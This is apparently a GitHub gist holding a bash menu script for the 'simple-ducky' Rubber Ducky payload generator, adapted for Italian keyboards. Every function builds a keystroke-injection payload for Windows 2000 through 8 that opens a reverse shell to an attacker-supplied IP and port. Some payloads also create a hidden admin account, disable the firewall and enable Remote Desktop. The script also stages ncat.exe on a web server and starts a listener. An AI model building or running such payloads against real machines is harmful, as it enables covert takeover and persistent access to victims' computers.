Last active
August 29, 2015 14:27
-
-
Save DiegoCaridei/d097c0d64231eda8e5a4 to your computer and use it in GitHub Desktop.
Rubber ducky italian script
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #1) donwnload the file wget https://simple-ducky-payload-generator.googlecode.com/files/installer_v1.1.1_debian.sh | |
| #2) Install script | |
| #3) download italian file config https://www.dropbox.com/s/5cfmwfth91z794q/it.properties?dl=0 | |
| #4) go at this folder /usr/share/simple-ducky and reply the script simple-ducky.sh with this script | |
| #5) add in the resources folder the file it.properties | |
| function_lan(){ | |
| clear | |
| echo -e "\e[1;34mPlease enter the keyboard code you would like to use.\e[0m" | |
| echo "" | |
| echo "it: Italian" | |
| echo "fr: French" | |
| echo "pt: Portuguese" | |
| echo "us: English-US" | |
| echo "be: Belgian" | |
| echo "da: Danish"f | |
| echo "de: German" | |
| echo "no: Norwegian" | |
| echo "sv: Swedish" | |
| echo "uk: English-UK" | |
| echo "" | |
| } | |
| f_persistenceVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat | |
| if [ "$Ncat" == "y" ]; then | |
| clear | |
| cp /usr/share/simple-ducky/misc/ncat.exe /var/www/ | |
| service apache2 stop | |
| service apache2 start | |
| clear | |
| else | |
| clear | |
| fi | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| xterm -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Persistence Reverse Shell w/o UAC (Win Vista/7) | |
| ################################################################################# | |
| f_persistenceVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC disabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat | |
| if [ "$Ncat" == "y" ]; then | |
| clear | |
| cp /usr/share/simple-ducky/misc/ncat.exe /var/www/ | |
| service apache2 stop | |
| service apache2 start | |
| clear | |
| else | |
| clear | |
| fi | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Persistence Reverse Shell w/UAC (Win 8) | |
| ################################################################################# | |
| f_persistenceWIN8uac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat | |
| if [ "$Ncat" == "y" ]; then | |
| clear | |
| cp /usr/share/simple-ducky/misc/ncat.exe /var/www/ | |
| service apache2 stop | |
| service apache2 start | |
| clear | |
| else | |
| clear | |
| fi | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Persistence Reverse Shell w/o UAC (Win 8) | |
| ################################################################################# | |
| f_persistenceWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide a reverse shell everytime a victim logs into his/her computer. It also creates and hides an admin account, drops the firewall, and enables Remote Deskop/Remote Assistance." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC disabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "Where shall I send your persistent shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "What is the IP/Domain address for your webserver? " | |
| read -p "[Example: www.example.com | www.example.com:port | $attackerip] " webserverip | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| read -p "If you are using Kali, would you like me to move ncat.exe to your web directory and start your webserver [y/n]? " Ncat | |
| if [ "$Ncat" == "y" ]; then | |
| clear | |
| cp /usr/share/simple-ducky/misc/ncat.exe /var/www/ | |
| service apache2 stop | |
| service apache2 start | |
| clear | |
| else | |
| clear | |
| fi | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/persistenceWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip-attackerport/$attackerip $attackerport/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Windows Reverse Shell (No Download|W2K/XP) | |
| ################################################################################# | |
| f_windowsrevW2KXP(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when the Powershell, Download, and Execute is not feesable." | |
| echo -e "\e[1;31mTarget:\e[0m WIN2K/XP" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevW2KXP.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Windows Reverse Shell w/UAC (No Download|Win Vista/7) | |
| ################################################################################# | |
| f_windowsrevVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC enabled\e[0m" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use milliseconds (15000 ms = 15 sec)" pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Windows Reverse Shell w/o UAC (No Download|Win Vista/7) | |
| ################################################################################# | |
| f_windowsrevVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC enabled\e[0m" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Windows Reverse Shell w/UAC (No Download|Win 8) | |
| ################################################################################# | |
| f_windowsrevWIN8uac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC enabled\e[0m" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Windows Reverse Shell w/o UAC (No Download|Win 8) | |
| ################################################################################# | |
| f_windowsrevWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to provide an adminstrative reverse shell when Powershell, Download, and Execute is not feesable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC enabled\e[0m" | |
| echo -e "\e[1;31mAuthor:\e[0m Darren Kitchen (Props to IllWill)(slight modifications by skysploit)" | |
| echo "" | |
| echo "" | |
| read -p "Where shall I send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| echo -e "How long of a delay would like before starting? " | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| echo "" | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payloads/windowsrevWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerport/$attackerport/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| read -p "Would you like me to setup a listener [y/n]? " listener | |
| clear | |
| if [ "$listener" == "n" ]; then | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| else | |
| x-terminal-emulator -e ncat -lvp $attackerport & | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| fi | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
